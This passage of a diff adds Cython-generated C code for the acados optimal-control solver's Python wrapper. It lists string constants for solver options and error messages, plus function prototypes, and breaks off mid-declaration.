__pyx_k_r[] = "r"; +static const char __pyx_k_t[] = "t"; +static const char __pyx_k_u[] = "u"; +static const char __pyx_k_w[] = "w"; +static const char __pyx_k_x[] = "x"; +static const char __pyx_k_z[] = "z"; +static const char __pyx_k__2[] = "."; +static const char __pyx_k__3[] = "*"; +static const char __pyx_k__6[] = "'"; +static const char __pyx_k__7[] = ")"; +static const char __pyx_k_ex[] = "ex"; +static const char __pyx_k_gc[] = "gc"; +static const char __pyx_k_id[] = "id"; +static const char __pyx_k_np[] = "np"; +static const char __pyx_k_nx[] = "nx"; +static const char __pyx_k_os[] = "os"; +static const char __pyx_k_pi[] = "pi"; +static const char __pyx_k_sl[] = "sl"; +static const char __pyx_k_su[] = "su"; +static const char __pyx_k_SQP[] = "SQP"; +static const char __pyx_k__14[] = ""; +static const char __pyx_k__15[] = "_"; +static const char __pyx_k__29[] = ", "; +static const char __pyx_k__84[] = "?"; +static const char __pyx_k_abc[] = "abc"; +static const char __pyx_k_and[] = " and "; +static const char __pyx_k_get[] = "get"; +static const char __pyx_k_got[] = " (got "; +static const char __pyx_k_int[] = "int"; +static const char __pyx_k_key[] = "key"; +static const char __pyx_k_lam[] = "lam"; +static const char __pyx_k_lbu[] = "lbu"; +static const char __pyx_k_lbx[] = "lbx"; +static const char __pyx_k_msg[] = "msg"; +static const char __pyx_k_new[] = "__new__"; +static const char __pyx_k_obj[] = "obj"; +static const char __pyx_k_out[] = "out"; +static const char __pyx_k_set[] = "set"; +static const char __pyx_k_sys[] = "sys"; +static const char __pyx_k_t_2[] = "t_"; +static const char __pyx_k_u_2[] = "u_"; +static const char __pyx_k_ubu[] = "ubu"; +static const char __pyx_k_ubx[] = "ubx"; +static const char __pyx_k_x_2[] = "x_"; +static const char __pyx_k_z_2[] = "z_"; +static const char __pyx_k_None[] = "None"; +static const char __pyx_k_TODO[] = "TODO!"; +static const char __pyx_k_base[] = "base"; +static const char __pyx_k_dict[] = "__dict__"; +static const char __pyx_k_dims[] = "dims"; +static const char __pyx_k_dump[] = "dump"; +static const char __pyx_k_exit[] = "__exit__"; +static const char __pyx_k_join[] = "join"; +static const char __pyx_k_json[] = "json"; +static const char __pyx_k_keys[] = "keys"; +static const char __pyx_k_load[] = "load"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_mode[] = "mode"; +static const char __pyx_k_name[] = "name"; +static const char __pyx_k_ndim[] = "ndim"; +static const char __pyx_k_open[] = "open"; +static const char __pyx_k_pack[] = "pack"; +static const char __pyx_k_path[] = "path"; +static const char __pyx_k_pi_2[] = "pi_"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_size[] = "size"; +static const char __pyx_k_sl_2[] = "sl_"; +static const char __pyx_k_spec[] = "__spec__"; +static const char __pyx_k_step[] = "step"; +static const char __pyx_k_stop[] = "stop"; +static const char __pyx_k_su_2[] = "su_"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_yref[] = "yref"; +static const char __pyx_k_ASCII[] = "ASCII"; +static const char __pyx_k_alpha[] = "alpha"; +static const char __pyx_k_array[] = "array"; +static const char __pyx_k_class[] = "__class__"; +static const char __pyx_k_count[] = "count"; +static const char __pyx_k_dtype[] = "dtype"; +static const char __pyx_k_enter[] = "__enter__"; +static const char __pyx_k_error[] = "error"; +static const char __pyx_k_field[] = "field"; +static const char __pyx_k_flags[] = "flags"; +static const char __pyx_k_index[] = "index"; +static const char __pyx_k_lam_2[] = "lam_"; +static const char __pyx_k_numpy[] = "numpy"; +static const char __pyx_k_order[] = "order"; +static const char __pyx_k_print[] = "print"; +static const char __pyx_k_range[] = "range"; +static const char __pyx_k_reset[] = "reset"; +static const char __pyx_k_shape[] = "shape"; +static const char __pyx_k_solve[] = "solve"; +static const char __pyx_k_split[] = "split"; +static const char __pyx_k_stage[] = "stage"; +static const char __pyx_k_start[] = "start"; +static const char __pyx_k_utf_8[] = "utf-8"; +static const char __pyx_k_value[] = "value_"; +static const char __pyx_k_y_ref[] = "y_ref"; +static const char __pyx_k_zeros[] = "zeros"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_encode[] = "encode"; +static const char __pyx_k_fields[] = "fields"; +static const char __pyx_k_format[] = "format"; +static const char __pyx_k_getcwd[] = "getcwd"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_indent[] = "indent"; +static const char __pyx_k_isfile[] = "isfile"; +static const char __pyx_k_json_2[] = ".json"; +static const char __pyx_k_name_2[] = "__name__"; +static const char __pyx_k_pickle[] = "pickle"; +static const char __pyx_k_qp_mu0[] = "qp_mu0"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_res_eq[] = "res_eq"; +static const char __pyx_k_stat_m[] = "stat_m"; +static const char __pyx_k_stat_n[] = "stat_n"; +static const char __pyx_k_struct[] = "struct"; +static const char __pyx_k_tol_eq[] = "tol_eq"; +static const char __pyx_k_tolist[] = "tolist"; +static const char __pyx_k_unpack[] = "unpack"; +static const char __pyx_k_update[] = "update"; +static const char __pyx_k_utcnow[] = "utcnow"; +static const char __pyx_k_SQP_RTI[] = "SQP_RTI"; +static const char __pyx_k_default[] = "default"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_field_2[] = "field_"; +static const char __pyx_k_float64[] = "float64"; +static const char __pyx_k_fortran[] = "fortran"; +static const char __pyx_k_iterate[] = "iterate"; +static const char __pyx_k_memview[] = "memview"; +static const char __pyx_k_out_mat[] = "out_mat"; +static const char __pyx_k_qp_iter[] = "qp_iter"; +static const char __pyx_k_time_qp[] = "time_qp"; +static const char __pyx_k_value_2[] = "value"; +static const char __pyx_k_z_guess[] = "z_guess"; +static const char __pyx_k_Ellipsis[] = "Ellipsis"; +static const char __pyx_k_Sequence[] = "Sequence"; +static const char __pyx_k_at_stage[] = "\" at stage "; +static const char __pyx_k_cost_set[] = "cost_set"; +static const char __pyx_k_datetime[] = "datetime"; +static const char __pyx_k_filename[] = "filename"; +static const char __pyx_k_get_cost[] = "get_cost"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_itemsize[] = "itemsize"; +static const char __pyx_k_min_size[] = "min_size"; +static const char __pyx_k_pyx_type[] = "__pyx_type"; +static const char __pyx_k_register[] = "register"; +static const char __pyx_k_res_comp[] = "res_comp"; +static const char __pyx_k_res_ineq[] = "res_ineq"; +static const char __pyx_k_res_stat[] = "res_stat"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_solution[] = "solution"; +static const char __pyx_k_sqp_iter[] = "sqp_iter"; +static const char __pyx_k_strftime[] = "strftime"; +static const char __pyx_k_time_lin[] = "time_lin"; +static const char __pyx_k_time_reg[] = "time_reg"; +static const char __pyx_k_time_sim[] = "time_sim"; +static const char __pyx_k_time_tot[] = "time_tot"; +static const char __pyx_k_tol_comp[] = "tol_comp"; +static const char __pyx_k_tol_ineq[] = "tol_ineq"; +static const char __pyx_k_tol_stat[] = "tol_stat"; +static const char __pyx_k_you_have[] = " (you have "; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_alpha_min[] = "alpha_min"; +static const char __pyx_k_enumerate[] = "enumerate"; +static const char __pyx_k_for_field[] = " for field \""; +static const char __pyx_k_get_stats[] = "get_stats"; +static const char __pyx_k_int_value[] = "int_value"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_overwrite[] = "overwrite"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_qp_tol_eq[] = "qp_tol_eq"; +static const char __pyx_k_recompute[] = "recompute"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_residuals[] = "residuals"; +static const char __pyx_k_rti_phase[] = "rti_phase"; +static const char __pyx_k_sort_keys[] = "sort_keys"; +static const char __pyx_k_time_glob[] = "time_glob"; +static const char __pyx_k_IndexError[] = "IndexError"; +static const char __pyx_k_ValueError[] = "ValueError"; +static const char __pyx_k_full_stats[] = "full_stats"; +static const char __pyx_k_int_fields[] = "int_fields"; +static const char __pyx_k_mem_fields[] = "mem_fields"; +static const char __pyx_k_model_name[] = "model_name"; +static const char __pyx_k_out_fields[] = "out_fields"; +static const char __pyx_k_pyx_result[] = "__pyx_result"; +static const char __pyx_k_pyx_vtable[] = "__pyx_vtable__"; +static const char __pyx_k_qp_tau_min[] = "qp_tau_min"; +static const char __pyx_k_statistics[] = "statistics"; +static const char __pyx_k_xdot_guess[] = "xdot_guess"; +static const char __pyx_k_ImportError[] = "ImportError"; +static const char __pyx_k_MemoryError[] = "MemoryError"; +static const char __pyx_k_PickleError[] = "PickleError"; +static const char __pyx_k_collections[] = "collections"; +static const char __pyx_k_cost_fields[] = "cost_fields"; +static const char __pyx_k_options_set[] = "options_set"; +static const char __pyx_k_print_level[] = "print_level"; +static const char __pyx_k_qp_tol_comp[] = "qp_tol_comp"; +static const char __pyx_k_qp_tol_ineq[] = "qp_tol_ineq"; +static const char __pyx_k_qp_tol_stat[] = "qp_tol_stat"; +static const char __pyx_k_step_length[] = "step_length"; +static const char __pyx_k_time_sim_ad[] = "time_sim_ad"; +static const char __pyx_k_time_sim_la[] = "time_sim_la"; +static const char __pyx_k_value_shape[] = "value_shape"; +static const char __pyx_k_double_value[] = "double_value"; +static const char __pyx_k_dynamics_get[] = "dynamics_get"; +static const char __pyx_k_get_stat_int[] = "__get_stat_int"; +static const char __pyx_k_initializing[] = "_initializing"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_load_iterate[] = "load_iterate"; +static const char __pyx_k_pyx_checksum[] = "__pyx_checksum"; +static const char __pyx_k_string_value[] = "string_value"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_version_info[] = "version_info"; +static const char __pyx_k_Y_m_d_H_M_S_f[] = "%Y-%m-%d-%H:%M:%S.%f"; +static const char __pyx_k_class_getitem[] = "__class_getitem__"; +static const char __pyx_k_double_fields[] = "double_fields"; +static const char __pyx_k_get_residuals[] = "get_residuals"; +static const char __pyx_k_globalization[] = "globalization"; +static const char __pyx_k_qp_warm_start[] = "qp_warm_start"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_store_iterate[] = "store_iterate"; +static const char __pyx_k_string_fields[] = "string_fields"; +static const char __pyx_k_time_qp_xcond[] = "time_qp_xcond"; +static const char __pyx_k_AssertionError[] = "AssertionError"; +static const char __pyx_k_asfortranarray[] = "asfortranarray"; +static const char __pyx_k_full_step_dual[] = "full_step_dual"; +static const char __pyx_k_new_time_steps[] = "new_time_steps"; +static const char __pyx_k_with_dimension[] = " with dimension "; +static const char __pyx_k_View_MemoryView[] = "View.MemoryView"; +static const char __pyx_k_allocate_buffer[] = "allocate_buffer"; +static const char __pyx_k_alpha_reduction[] = "alpha_reduction"; +static const char __pyx_k_collections_abc[] = "collections.abc"; +static const char __pyx_k_constraints_set[] = "constraints_set"; +static const char __pyx_k_dtype_is_object[] = "dtype_is_object"; +static const char __pyx_k_eval_param_sens[] = "eval_param_sens"; +static const char __pyx_k_get_stat_double[] = "__get_stat_double"; +static const char __pyx_k_get_stat_matrix[] = "__get_stat_matrix"; +static const char __pyx_k_nlp_solver_type[] = "nlp_solver_type"; +static const char __pyx_k_pyx_PickleError[] = "__pyx_PickleError"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_print_statistics[] = "print_statistics"; +static const char __pyx_k_qp_solver_cond_N[] = "qp_solver_cond_N"; +static const char __pyx_k_ascontiguousarray[] = "ascontiguousarray"; +static const char __pyx_k_pyx_unpickle_Enum[] = "__pyx_unpickle_Enum"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_constraints_fields[] = "constraints_fields"; +static const char __pyx_k_set_new_time_steps[] = "set_new_time_steps"; +static const char __pyx_k_strided_and_direct[] = ""; +static const char __pyx_k_NotImplementedError[] = "NotImplementedError"; +static const char __pyx_k_get_pointers_solver[] = "__get_pointers_solver"; +static const char __pyx_k_initialize_t_slacks[] = "initialize_t_slacks"; +static const char __pyx_k_time_qp_solver_call[] = "time_qp_solver_call"; +static const char __pyx_k_warm_start_first_qp[] = "warm_start_first_qp"; +static const char __pyx_k_strided_and_indirect[] = ""; +static const char __pyx_k_AcadosOcpSolverCython[] = "AcadosOcpSolverCython"; +static const char __pyx_k_Invalid_shape_in_axis[] = "Invalid shape in axis "; +static const char __pyx_k_contiguous_and_direct[] = ""; +static const char __pyx_k_globalization_use_SOC[] = "globalization_use_SOC"; +static const char __pyx_k_Cannot_index_with_type[] = "Cannot index with type '"; +static const char __pyx_k_MemoryView_of_r_object[] = ""; +static const char __pyx_k_eps_sufficient_descent[] = "eps_sufficient_descent"; +static const char __pyx_k_MemoryView_of_r_at_0x_x[] = ""; +static const char __pyx_k_contiguous_and_indirect[] = ""; +static const char __pyx_k_update_qp_solver_cond_N[] = "update_qp_solver_cond_N"; +static const char __pyx_k_with_dimension_you_have[] = "with dimension {} (you have {})"; +static const char __pyx_k_AcadosOcpSolverCython_get[] = "AcadosOcpSolverCython.get"; +static const char __pyx_k_AcadosOcpSolverCython_set[] = "AcadosOcpSolverCython.set"; +static const char __pyx_k_Dimension_d_is_not_direct[] = "Dimension %d is not direct"; +static const char __pyx_k_stored_current_iterate_in[] = "stored current iterate in "; +static const char __pyx_k_Index_out_of_bounds_axis_d[] = "Index out of bounds (axis %d)"; +static const char __pyx_k_AcadosOcpSolverCython_reset[] = "AcadosOcpSolverCython.reset"; +static const char __pyx_k_AcadosOcpSolverCython_solve[] = "AcadosOcpSolverCython.solve"; +static const char __pyx_k_Step_may_not_be_zero_axis_d[] = "Step may not be zero (axis %d)"; +static const char __pyx_k_itemsize_0_for_cython_array[] = "itemsize <= 0 for cython.array"; +static const char __pyx_k_store_iterate_locals_lambda[] = "store_iterate.."; +static const char __pyx_k_time_solution_sensitivities[] = "time_solution_sensitivities"; +static const char __pyx_k_unable_to_allocate_array_data[] = "unable to allocate array data."; +static const char __pyx_k_AcadosOcpSolverCython_cost_set[] = "AcadosOcpSolverCython.cost_set"; +static const char __pyx_k_AcadosOcpSolverCython_get_cost[] = "AcadosOcpSolverCython.get_cost"; +static const char __pyx_k_strided_and_direct_or_indirect[] = ""; +static const char __pyx_k_AcadosOcpSolverCython__get_poin[] = "_AcadosOcpSolverCython__get_pointers_solver"; +static const char __pyx_k_AcadosOcpSolverCython__get_stat[] = "_AcadosOcpSolverCython__get_stat_int"; +static const char __pyx_k_AcadosOcpSolverCython_get_field[] = "AcadosOcpSolverCython.get(): field {} does not exist at final stage {}."; +static const char __pyx_k_AcadosOcpSolverCython_get_is_an[] = "AcadosOcpSolverCython.get(): {} is an invalid argument. \n Possible values are {}. Exiting."; +static const char __pyx_k_AcadosOcpSolverCython_get_stage[] = "AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}."; +static const char __pyx_k_AcadosOcpSolverCython_get_stats[] = "AcadosOcpSolverCython.get_stats"; +static const char __pyx_k_AcadosOcpSolverCython_update_qp[] = "AcadosOcpSolverCython.update_qp_solver_cond_N"; +static const char __pyx_k_numpy_core_multiarray_failed_to[] = "numpy.core.multiarray failed to import"; +static const char __pyx_k_AcadosOcpSolverCython___get_poin[] = "AcadosOcpSolverCython.__get_pointers_solver"; +static const char __pyx_k_AcadosOcpSolverCython___get_stat[] = "AcadosOcpSolverCython.__get_stat_int"; +static const char __pyx_k_AcadosOcpSolverCython___reduce_c[] = "AcadosOcpSolverCython.__reduce_cython__"; +static const char __pyx_k_AcadosOcpSolverCython___setstate[] = "AcadosOcpSolverCython.__setstate_cython__"; +static const char __pyx_k_AcadosOcpSolverCython_constraint[] = "AcadosOcpSolverCython.constraints_set(): mismatching dimension"; +static const char __pyx_k_AcadosOcpSolverCython_cost_set_m[] = "AcadosOcpSolverCython.cost_set(): mismatching dimension"; +static const char __pyx_k_AcadosOcpSolverCython_does_not_s[] = "AcadosOcpSolverCython: does not support set_new_time_steps() since it is only a prototyping feature"; +static const char __pyx_k_AcadosOcpSolverCython_dynamics_g[] = "AcadosOcpSolverCython.dynamics_get"; +static const char __pyx_k_AcadosOcpSolverCython_eval_param[] = "AcadosOcpSolverCython.eval_param_sens(): index must be Integer."; +static const char __pyx_k_AcadosOcpSolverCython_get_residu[] = "AcadosOcpSolverCython.get_residuals"; +static const char __pyx_k_AcadosOcpSolverCython_load_itera[] = "AcadosOcpSolverCython.load_iterate"; +static const char __pyx_k_AcadosOcpSolverCython_options_se[] = "AcadosOcpSolverCython.options_set() does not support field {}.\n Possible values are {}."; +static const char __pyx_k_AcadosOcpSolverCython_print_stat[] = "AcadosOcpSolverCython.print_statistics"; +static const char __pyx_k_AcadosOcpSolverCython_set_is_not[] = "AcadosOcpSolverCython.set(): {} is not a valid argument. \nPossible values are {}. Exiting."; +static const char __pyx_k_AcadosOcpSolverCython_set_mismat[] = "AcadosOcpSolverCython.set(): mismatching dimension for field \"{}\" "; +static const char __pyx_k_AcadosOcpSolverCython_set_new_ti[] = "AcadosOcpSolverCython.set_new_time_steps"; +static const char __pyx_k_AcadosOcpSolverCython_solve_argu[] = "AcadosOcpSolverCython.solve(): argument 'rti_phase' can take only values 0, 1, 2 for SQP-RTI-type solvers"; +static const char __pyx_k_AcadosOcpSolverCython_store_iter[] = "AcadosOcpSolverCython.store_iterate"; +static const char __pyx_k_All_dimensions_preceding_dimensi[] = "All dimensions preceding dimension %d must be indexed and not sliced"; +static const char __pyx_k_Buffer_view_does_not_expose_stri[] = "Buffer view does not expose strides"; +static const char __pyx_k_Can_only_create_a_buffer_that_is[] = "Can only create a buffer that is contiguous in memory."; +static const char __pyx_k_Cannot_assign_to_read_only_memor[] = "Cannot assign to read-only memoryview"; +static const char __pyx_k_Cannot_create_writable_memory_vi[] = "Cannot create writable memory view from read-only memoryview"; +static const char __pyx_k_Cannot_transpose_memoryview_with[] = "Cannot transpose memoryview with indirect dimensions"; +static const char __pyx_k_Empty_shape_tuple_for_cython_arr[] = "Empty shape tuple for cython.array"; +static const char __pyx_k_Incompatible_checksums_0x_x_vs_0[] = "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))"; +static const char __pyx_k_Indirect_dimensions_not_supporte[] = "Indirect dimensions not supported"; +static const char __pyx_k_Invalid_mode_expected_c_or_fortr[] = "Invalid mode, expected 'c' or 'fortran', got "; +static const char __pyx_k_Out_of_bounds_on_buffer_access_a[] = "Out of bounds on buffer access (axis "; +static const char __pyx_k_Unable_to_convert_item_to_object[] = "Unable to convert item to object"; +static const char __pyx_k_acados_template_acados_ocp_solve[] = "acados_template.acados_ocp_solver_pyx"; +static const char __pyx_k_alpha_values_are_not_available_f[] = "alpha values are not available for SQP_RTI"; +static const char __pyx_k_got_differing_extents_in_dimensi[] = "got differing extents in dimension "; +static const char __pyx_k_line_search_use_sufficient_desce[] = "line_search_use_sufficient_descent"; +static const char __pyx_k_load_iterate_failed_file_does_no[] = "load_iterate: failed, file does not exist: "; +static const char __pyx_k_no_default___reduce___due_to_non[] = "no default __reduce__ due to non-trivial __cinit__"; +static const char __pyx_k_numpy_core_umath_failed_to_impor[] = "numpy.core.umath failed to import"; +static const char __pyx_k_solver_option_must_be_of_type_fl[] = "solver option {} must be of type float. You have {}."; +static const char __pyx_k_solver_option_must_be_of_type_in[] = "solver option {} must be of type int. You have {}."; +static const char __pyx_k_solver_option_must_be_of_type_st[] = "solver option {} must be of type str. You have {}."; +static const char __pyx_k_third_party_acados_acados_templa[] = "third_party/acados/acados_template/acados_ocp_solver_pyx.pyx"; +static const char __pyx_k_unable_to_allocate_shape_and_str[] = "unable to allocate shape and strides."; +static const char __pyx_k_AcadosOcpSolverCython__get_stat_2[] = "_AcadosOcpSolverCython__get_stat_double"; +static const char __pyx_k_AcadosOcpSolverCython__get_stat_3[] = "_AcadosOcpSolverCython__get_stat_matrix"; +static const char __pyx_k_AcadosOcpSolverCython___get_stat_2[] = "AcadosOcpSolverCython.__get_stat_double"; +static const char __pyx_k_AcadosOcpSolverCython___get_stat_3[] = "AcadosOcpSolverCython.__get_stat_matrix"; +static const char __pyx_k_AcadosOcpSolverCython_constraint_2[] = "AcadosOcpSolverCython.constraints_set"; +static const char __pyx_k_AcadosOcpSolverCython_does_not_s_2[] = "AcadosOcpSolverCython: does not support update_qp_solver_cond_N() since it is only a prototyping feature"; +static const char __pyx_k_AcadosOcpSolverCython_eval_param_2[] = "AcadosOcpSolverCython.eval_param_sens(): index must be in [0, nx-1], got: "; +static const char __pyx_k_AcadosOcpSolverCython_eval_param_3[] = "AcadosOcpSolverCython.eval_param_sens"; +static const char __pyx_k_AcadosOcpSolverCython_options_se_2[] = "AcadosOcpSolverCython.options_set"; +static const char __pyx_k_AcadosOcpSolverCython_solve_argu_2[] = "AcadosOcpSolverCython.solve(): argument 'rti_phase' can take only value 0 for SQP-type solvers"; +/* #### Code section: decls ### */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, PyObject *__pyx_v_format, PyObject *__pyx_v_mode, int __pyx_v_allocate_buffer); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(struct __pyx_array_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /* proto */ +static void __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_5array_7memview___get__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static Py_ssize_t __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_attr); /* proto */ +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf___pyx_array___reduce_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_array_2__setstate_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(struct __pyx_MemviewEnum_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_MemviewEnum___reduce_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_MemviewEnum_2__setstate_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj, int __pyx_v_flags, int __pyx_v_dtype_is_object); /* proto */ +static void __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(struct __pyx_memoryview_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static Py_ssize_t __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryview___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryview_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static void __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryviewslice___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryviewslice_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython___cinit__(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_model_name, PyObject *__pyx_v_nlp_solver_type, PyObject *__pyx_v_N); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_new_time_steps); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_qp_solver_cond_N); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_stage, 